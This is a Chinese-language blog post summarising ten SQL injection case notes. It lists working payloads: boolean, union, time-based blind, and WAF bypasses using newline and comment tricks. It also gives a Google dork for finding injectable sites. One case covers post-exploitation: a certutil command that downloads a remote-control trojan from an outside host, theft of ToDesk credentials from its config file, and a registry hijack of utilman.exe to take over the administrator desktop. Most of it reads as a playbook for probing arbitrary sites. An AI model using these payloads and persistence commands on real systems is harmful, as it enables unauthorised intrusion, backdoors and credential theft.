sql注入案例总结

1、access注入.docx

1、信息收集

发现为asp站,access数据库

首先判断注入类型,判断完之后为数字型注入

2、测试poc

丢入poc:%20and%20exists%20(select%20*%20from%20表名)

3、用bp爆出表名

得到表名为news

2、sql注入报告.docx

1、用单引号多次试探返回字节长度

2、找到规律率后构建轮子

poc:   'or+1='1永恒之白

3、发现有waf后测试出过滤字符

尝试or、=、<>、!=、like、alike、regexp、xor、and、%0a、/**/、user()、database()、hostname、version

4、构建轮子尝试:

Poc: 1'or%0a'user'%0alike'b

Poc : 1'or%0a'()'%0alike'b

5、尝试成功后,用工具跑出表名,到此为止

3、绕过waf

1、单引号测试闭合发现sql语句

2、尝试联合注入,测试字段长度

Poc:1'union+select+1,2,...,n --+

3、多次尝试获得回显位置

4、SQL注入-盲注.pdf

1、单引号尝试注入点,发现返回字节长度规律

2、构造轮子尝试获取数据

3、如有waf想办法绕过

5、记一次SQL注入#2.pdf

1、发现注入点

2、单引号多次尝试,发现呈现周期性的变化

3、手工注入,构造 poc 轮子

4、多次尝试后获得poc

poc 'or+1/0=1+or'a'='a
5、用工具爆出库名,到此为止

6、记一次SQL注入#3.pdf

1 、挖掘注入点
谷歌语法: inurl: "?id="
2、在参数值后面加 /1 /0 判断注入类型(数值型、字符型)
3、 构造轮子
if(1,1,0) 可行,=,like,<>, !=, >=,<=,>,< ,rlike,ascii,mid出现永恒之白
多次尝试发现hex(), schema() ,left(),right()可行
4、获取 poc: 2/if(68.=hex(left(schema(),1)),1,0)
5、用工具跑出库名那个,到此为止

7、记一次渗透测试#H1某目标SQL注入.pdf

1、信息收集

2、发现可疑点果断下手

3、尝试无果后果断放弃,此家无缘换下一家

4、继续构建轮子,查看回显

Poc: 1'or%20if(1,sleep(3),1)='1
5、找到规律生成poc
Poc :1'or%20if((user()like'h%'),sleep(3),1)='1
6、工具跑出库名,到此为止

8、记一次由SQL注入引发的血案.pdf

1、懒人模式,上来直接工具扫出漏洞,system 权限的注入

2、可执行命令直接上上马(免杀马伺候)

windows 远程下载绕过命令就往它目录里下我的远控木马
命令:
certutil -url""""cache -split -f http://xxxx/1.exe
C:\ProgramData\1.exe
3、当止步不前时,多看看有啥可利用工具( todesk
todesk 这个软件可以静默安装(静默安装的命令
todesk.exe /S ),而且我
们和连接密码都在配置文件中,配置文件一般都是 C:\Program
Files\ToDesk\config.ini,咱可以利用 type 命令直接查看安装后的配置文件,
从而获取目标系统连接的账户的 id 和密码,从而登录目标系统的桌面
4、没有账号密码是,看看界面有啥可利用点(utilman)
utilman 是 Windows 辅助工具管理器程序也就是放大镜,粘滞键等等
而 windows 中 : tscon 命令常常用来 切换远程桌面的会话 ,我们如果能劫
utilman,将 utilman 替换成 cmd.exe,我们点击以后就可以弹出 cmd 的框,
这样我们使用 tscon 命令就可以切换到他管理员的桌面
5、注入劫持命令
命令: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d
"C:\windows\system32\cmd.exe" /f
6、劫持后想干啥就能干啥
点击我们的 utilman,可以看到成功弹出我们 cmd 框
可以看到 administrator 的 id 为 1
使用命令 tscon 1
7、成功切换到桌面后及时收手,非礼勿视

9、绕过正则SQL注入.pdf

1、寻找注入点

参数后面不断添加单引号,返回包中的 “ data ”数值呈规律性变化,判断此处存在 SQL 注入
2、构造基础 POC
多次尝试发现服务器waf正则匹配,于是乎采用注释加换行绕过
commonUserName=123'or--+777777777777%0a1='1
POC 变形: commonUserName=123'or-- +777777777777%0aUSER%0alike'A%
3、跑数据
爆出数据库名,及时收手

10、总结

1、利用工具,网站,等收集信息寻找注入点

2、找不到注入点果断换下一家,不要浪费时间(方向不对,努力白费)

3、构造轮子多次尝试绕WAF

4、生成POC

5、跑出库名

6、及时止步,远离犯罪

你可能感兴趣的:(sql,数据库,服务器)